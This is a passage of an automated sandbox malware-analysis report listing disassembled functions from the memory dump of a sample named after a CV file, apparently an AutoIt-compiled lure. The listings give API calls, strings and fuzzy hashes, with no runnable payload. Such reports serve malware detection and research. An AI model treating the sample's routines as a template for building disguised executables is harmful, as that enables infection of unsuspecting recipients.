                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: htonsinet_addr
                                                                                        • String ID: 255.255.255.255
                                                                                        • API String ID: 3832099526-2422070025
                                                                                        • Opcode ID: 2d90c268cc9924ccff918675f9f6bb4e92734b20c66b82a217db86bae7a238da
                                                                                        • Instruction ID: eeb3fa79f817cded5c309e82670a5d5f90c31379e2e1d8719a23a38fe74c3174
                                                                                        • Opcode Fuzzy Hash: 2d90c268cc9924ccff918675f9f6bb4e92734b20c66b82a217db86bae7a238da
                                                                                        • Instruction Fuzzy Hash: 69012276600304ABCB22AFA8D986FA9B768EF44314F10842BF916AB3D1C771E805D756
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 003BB7EF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 3850602802-1403004172
                                                                                        • Opcode ID: c15f0e2ac7adccf9216c28027f3e99d200bbbf025ddd655bd6431b1f58284383
                                                                                        • Instruction ID: 543313d1cdd25aff5373e654f32a79cc5fc66b73f98e5eb0596073dc5163a8a4
                                                                                        • Opcode Fuzzy Hash: c15f0e2ac7adccf9216c28027f3e99d200bbbf025ddd655bd6431b1f58284383
                                                                                        • Instruction Fuzzy Hash: C5012871610214ABCB06FBA4CC52DFE73ADBF46314B10061EF561AB2C1EFB05908C764
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 003BB6EB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 3850602802-1403004172
                                                                                        • Opcode ID: 32833819e8474b1a8b655b491adf469b0b0007bc49d0e5e71faf3e2c98794440
                                                                                        • Instruction ID: 53f2d91b52cf0d53e70e750fe04df5da96326476b079dc8837158a15258ad390
                                                                                        • Opcode Fuzzy Hash: 32833819e8474b1a8b655b491adf469b0b0007bc49d0e5e71faf3e2c98794440
                                                                                        • Instruction Fuzzy Hash: EF01A7756411046BCB16FBA4C953FFEB3AC9F05348F10002AB602B7581EFA45E1887B5
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 003BB76C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 3850602802-1403004172
                                                                                        • Opcode ID: 398276e15d5b5a61840e2c2f852b58645d797d4b0c2b9bc29045e570d4efe2af
                                                                                        • Instruction ID: b55027426409d6ad8d1b4433eecbdb8c15c2d527219308cf3456581a15db012e
                                                                                        • Opcode Fuzzy Hash: 398276e15d5b5a61840e2c2f852b58645d797d4b0c2b9bc29045e570d4efe2af
                                                                                        • Instruction Fuzzy Hash: 21018F75640104ABCB02FAA4CA03BFEB3AC9F05348F10001AB502B7592EFA45E0987B5
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: __calloc_crt
                                                                                        • String ID: "D
                                                                                        • API String ID: 3494438863-842159925
                                                                                        • Opcode ID: cab7cdc3bf738c02a59ca31110d337daeb1b302c86f1e6e00b8fed4fa8548e4b
                                                                                        • Instruction ID: 38d4147223984a01ac603c20e07977f9c03f54dedf35cf2daad280e38ca5315e
                                                                                        • Opcode Fuzzy Hash: cab7cdc3bf738c02a59ca31110d337daeb1b302c86f1e6e00b8fed4fa8548e4b
                                                                                        • Instruction Fuzzy Hash: 51F0F6752496019AE7269F29BD416A67BD4FB87720F14817FF200CE287E7F0C8818798
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00380000,00000063,00000001,00000010,00000010,00000000), ref: 00384048
                                                                                        • EnumResourceNamesW.KERNEL32(00000000,0000000E,003C67E9,00000063,00000000,75C10280,?,?,00383EE1,?,?,000000FF), ref: 003F41B3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnumImageLoadNamesResource
                                                                                        • String ID: >8
                                                                                        • API String ID: 1578290342-2381723519
                                                                                        • Opcode ID: 1249c1e17db084c5c5c539f5537cf47dabe3379e81ad785439516c393599ecc2
                                                                                        • Instruction ID: 039d9a2a034d6d8293598a23e56239928112ce43d94d8e4007ed7524ba30f849
                                                                                        • Opcode Fuzzy Hash: 1249c1e17db084c5c5c539f5537cf47dabe3379e81ad785439516c393599ecc2
                                                                                        • Instruction Fuzzy Hash: 0AF0627564031577D3205B15BC4AFD73E59A706BB5F104526F614A65E0D2F094C48798
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassName_wcscmp
                                                                                        • String ID: #32770
                                                                                        • API String ID: 2292705959-463685578
                                                                                        • Opcode ID: fe55ce4139169e8921eba7864be69071a3c78b428ae47955e0e9ea533f6cb9e1
                                                                                        • Instruction ID: 404f8907c154bfab07a30777700ae0a79df4b0de39f095eaabdcb7cdd1a666f0
                                                                                        • Opcode Fuzzy Hash: fe55ce4139169e8921eba7864be69071a3c78b428ae47955e0e9ea533f6cb9e1
                                                                                        • Instruction Fuzzy Hash: 3BE09B77A0422427D7209BA5DC05F97FBACE755764F010026B905E7041D674960587D8
                                                                                        APIs
                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 003BA63F
                                                                                          • Part of subcall function 003A13F1: _doexit.LIBCMT ref: 003A13FB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message_doexit
                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                        • API String ID: 1993061046-4017498283
                                                                                        • Opcode ID: 19bba2323af8b8de7408747f18c7b14cffd312040aaec6af8441458170edbcbb
                                                                                        • Instruction ID: 487c08a28cfc814fa9d0fb4c24c5d336a7b506942d969a19e3433e8689358457
                                                                                        • Opcode Fuzzy Hash: 19bba2323af8b8de7408747f18c7b14cffd312040aaec6af8441458170edbcbb
                                                                                        • Instruction Fuzzy Hash: 48D02E323C472833C3163AA83C0BFC936488F0ABA1F140022FB08ED4C249E6DA8002ED
                                                                                        APIs
                                                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 003FACC0
                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 003FAEBD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryFreeLibrarySystem
                                                                                        • String ID: WIN_XPe
                                                                                        • API String ID: 510247158-3257408948
                                                                                        • Opcode ID: a3c69c37cf2d338a0395cfa01050fbc4abba5b8a33b622c0cb5a3b75ff6087b5
                                                                                        • Instruction ID: 3f353b5b85fd6c67c0a6777a4af7f0323f7e70ac60ea181886e118ccea514d21
                                                                                        • Opcode Fuzzy Hash: a3c69c37cf2d338a0395cfa01050fbc4abba5b8a33b622c0cb5a3b75ff6087b5
                                                                                        • Instruction Fuzzy Hash: 0FE039B0C009499FCB13DBA4DA449ECB7BCAB48700F108096E256B6660CB705A88DF26
                                                                                        APIs
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003E86A2
                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003E86B5
                                                                                          • Part of subcall function 003C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003C7AD0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 529655941-2988720461
                                                                                        • Opcode ID: 95397c9de3f3d0a1224d015bb96cb92170f1e03b44713dc81605bb676c170347
                                                                                        • Instruction ID: e5f71f40a829f7bd67fa1889aff34b18edf481ee3f1dc6e93bdf2a61c2de4674
                                                                                        • Opcode Fuzzy Hash: 95397c9de3f3d0a1224d015bb96cb92170f1e03b44713dc81605bb676c170347
                                                                                        • Instruction Fuzzy Hash: E9D0C935794314BBE36867B09D0BFC66A589B04B11F101829BA49AA1D0C9B5A9448B58
                                                                                        APIs
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003E86E2
                                                                                        • PostMessageW.USER32(00000000), ref: 003E86E9
                                                                                          • Part of subcall function 003C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003C7AD0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 529655941-2988720461
                                                                                        • Opcode ID: b2ab1e4bf1e672641e8aed1e21b58b0925ed1e08e1fbc8dc3b35b8d26723a0b9
                                                                                        • Instruction ID: fcae21af3ce12e3e39a37417c8aca2cf37ef0b38fabbadb959d703fed294b6dd
                                                                                        • Opcode Fuzzy Hash: b2ab1e4bf1e672641e8aed1e21b58b0925ed1e08e1fbc8dc3b35b8d26723a0b9
                                                                                        • Instruction Fuzzy Hash: A5D0C9317853147BE36967B09D0BFC66A589B08B11F101829BA45EA1D0C9B5A9448B58